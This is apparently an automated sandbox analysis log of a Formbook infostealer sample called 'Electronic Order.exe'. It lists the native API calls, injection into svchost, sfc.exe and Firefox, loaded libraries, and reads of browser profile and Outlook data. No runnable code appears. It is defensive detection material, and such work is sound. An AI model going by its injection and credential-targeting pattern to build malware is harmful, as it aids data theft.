            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CC0 NtQueryVirtualMemory,2_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CF0 NtOpenProcess,2_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CA0 NtQueryInformationToken,2_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573010 NtOpenDirectoryObject,2_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573090 NtSetValueKey,2_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035739B0 NtGetContextThread,2_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573D70 NtOpenThread,2_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573D10 NtOpenProcessToken,2_2_03573D10
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C4340 NtSetContextThread,LdrInitializeThunk,7_2_031C4340
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C4650 NtSuspendThread,LdrInitializeThunk,7_2_031C4650
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2B60 NtClose,LdrInitializeThunk,7_2_031C2B60
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_031C2BA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_031C2BF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_031C2BE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2AD0 NtReadFile,LdrInitializeThunk,7_2_031C2AD0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2AF0 NtWriteFile,LdrInitializeThunk,7_2_031C2AF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2F30 NtCreateSection,LdrInitializeThunk,7_2_031C2F30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2FB0 NtResumeThread,LdrInitializeThunk,7_2_031C2FB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2FE0 NtCreateFile,LdrInitializeThunk,7_2_031C2FE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_031C2E80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_031C2EE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_031C2D10
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_031C2D30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2DD0 NtDelayExecution,LdrInitializeThunk,7_2_031C2DD0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_031C2DF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_031C2C70
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2C60 NtCreateKey,LdrInitializeThunk,7_2_031C2C60
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_031C2CA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C35C0 NtCreateMutant,LdrInitializeThunk,7_2_031C35C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C39B0 NtGetContextThread,LdrInitializeThunk,7_2_031C39B0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2B80 NtQueryInformationFile,7_2_031C2B80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2AB0 NtWaitForSingleObject,7_2_031C2AB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2F60 NtCreateProcessEx,7_2_031C2F60
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2F90 NtProtectVirtualMemory,7_2_031C2F90
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2FA0 NtQuerySection,7_2_031C2FA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2E30 NtWriteVirtualMemory,7_2_031C2E30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2EA0 NtAdjustPrivilegesToken,7_2_031C2EA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2D00 NtSetInformationFile,7_2_031C2D00
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2DB0 NtEnumerateKey,7_2_031C2DB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2C00 NtQueryInformationProcess,7_2_031C2C00
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2CC0 NtQueryVirtualMemory,7_2_031C2CC0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2CF0 NtOpenProcess,7_2_031C2CF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C3010 NtOpenDirectoryObject,7_2_031C3010
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C3090 NtSetValueKey,7_2_031C3090
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C3D10 NtOpenProcessToken,7_2_031C3D10
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C3D70 NtOpenThread,7_2_031C3D70
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_007586C0 NtCreateFile,7_2_007586C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_00758830 NtReadFile,7_2_00758830
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_00758920 NtDeleteFile,7_2_00758920
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_007589C0 NtClose,7_2_007589C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_00758B30 NtAllocateVirtualMemory,7_2_00758B30
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E240B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00E240B1
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E18858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00E18858
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E2545F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03587E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0352B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 035BF290 appears 105 times
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: String function: 031D7E54 appears 111 times
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: String function: 031C5130 appears 58 times
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: String function: 031FEA12 appears 86 times
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: String function: 0317B970 appears 280 times
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: String function: 0320F290 appears 105 times
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: String function: 00DE0D27 appears 70 times
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: String function: 00DE8B40 appears 42 times
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: String function: 00DC7F41 appears 35 times
            Source: Electronic Order.exe, 00000000.00000003.2117454630.0000000003F8D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Electronic Order.exe
            Source: Electronic Order.exe, 00000000.00000003.2118237306.0000000003DE3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Electronic Order.exe
            Source: Electronic Order.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@13/8
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E2A2D5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E18713 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E2B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E3F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E386D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00DC4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\Electronic Order.exe | File created: C:\Users\user\AppData\Local\Temp\aut4F00.tmp
            Source: Electronic Order.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Electronic Order.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: sfc.exe, 00000007.00000003.2683963473.0000000002D66000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2674886619.0000000002D5B000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2674767278.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3957493430.0000000002D89000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3957493430.0000000002D5B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Electronic Order.exe | ReversingLabs: Detection: 50%
            Source: unknown | Process created: C:\Users\user\Desktop\Electronic Order.exe "C:\Users\user\Desktop\Electronic Order.exe"
            Source: C:\Users\user\Desktop\Electronic Order.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Electronic Order.exe"
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe | Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Windows\SysWOW64\sfc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Electronic Order.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Electronic Order.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Electronic Order.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Electronic Order.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Electronic Order.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Electronic Order.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Electronic Order.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Electronic Order.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Electronic Order.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Electronic Order.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\sfc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\sfc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Electronic Order.exe | Static file information: File size 1205760 > 1048576
            Source: Electronic Order.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Electronic Order.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Electronic Order.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Electronic Order.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Electronic Order.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Electronic Order.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Electronic Order.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BSPmWtBGjJwku.exe, 00000005.00000000.2308549836.000000000087E000.00000002.00000001.01000000.00000005.sdmp, BSPmWtBGjJwku.exe, 00000009.00000000.2557513223.000000000087E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Electronic Order.exe, 00000000.00000003.2120952342.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, Electronic Order.exe, 00000000.00000003.2118802233.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2195945105.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203602053.0000000003300000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2399169614.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2389630955.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.0000000003150000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Electronic Order.exe, 00000000.00000003.2120952342.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, Electronic Order.exe, 00000000.00000003.2118802233.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2389297645.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2195945105.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203602053.0000000003300000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, sfc.exe, 00000007.00000003.2399169614.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2389630955.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.0000000003150000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sfc.pdb source: svchost.exe, 00000002.00000003.2357574696.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357425251.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000002.3958315142.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000002.00000003.2357574696.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357425251.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000002.3958315142.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
            Source: Electronic Order.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Electronic Order.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Electronic Order.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Electronic Order.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Electronic Order.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00E3C304 LoadLibraryA,GetProcAddress, | 0_2_00E3C304
            Source: C:\Users\user\Desktop\Electronic Order.exe | Code function: 0_2_00DE8B85 push ecx; ret | 0_2_00DE8B98
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004181F4 push ecx; ret | 2_2_004181F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D27F push ds; ret | 2_2_0040D28D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004033F0 push eax; ret | 2_2_004033F2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A478 push 00000025h; iretd | 2_2_0041A534
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042DC13 push edi; ret | 2_2_0042DC1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413CE1 push 57C83816h; retf | 2_2_00413D79
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413D6A push 57C83816h; retf | 2_2_00413D79
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A515 push 00000025h; iretd | 2_2_0041A534
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A624 push ecx; retf | 2_2_0041A625
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040C68F push esi; ret | 2_2_0040C691
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041377B push es; retf | 2_2_00413782
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040872A push ecx; ret | 2_2_0040872B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0350225F pushad ; ret | 2_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035027FA pushad ; ret | 2_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx | 2_2_035309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0350283D push eax; iretd | 2_2_03502858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0350135E push eax; iretd | 2_2_03501369
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_0315225F pushad ; ret | 7_2_031527F9
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_031527FA pushad ; ret | 7_2_031527F9
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_031809AD push ecx; mov dword ptr [esp], ecx | 7_2_031809B6
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_0315283D push eax; iretd | 7_2_03152858
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_03151368 push eax; iretd | 7_2_03151369
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_007500AC pushfd ; ret | 7_2_007500AD
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_00740388 push es; retf | 7_2_0074038F
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_0074252D push edx; ret | 7_2_00742537
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_0075A820 push edi; ret | 7_2_0075A82C
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_007408EE push 57C83816h; retf | 7_2_00740986
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_00740977 push 57C83816h; retf | 7_2_00740986
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_00744E01 push ecx; ret | 7_2_00744E03
            Source: C:\Windows\SysWOW64\sfc.exe | Code function: 7_2_00747085 push 00000025h; iretd | 7_2_00747141
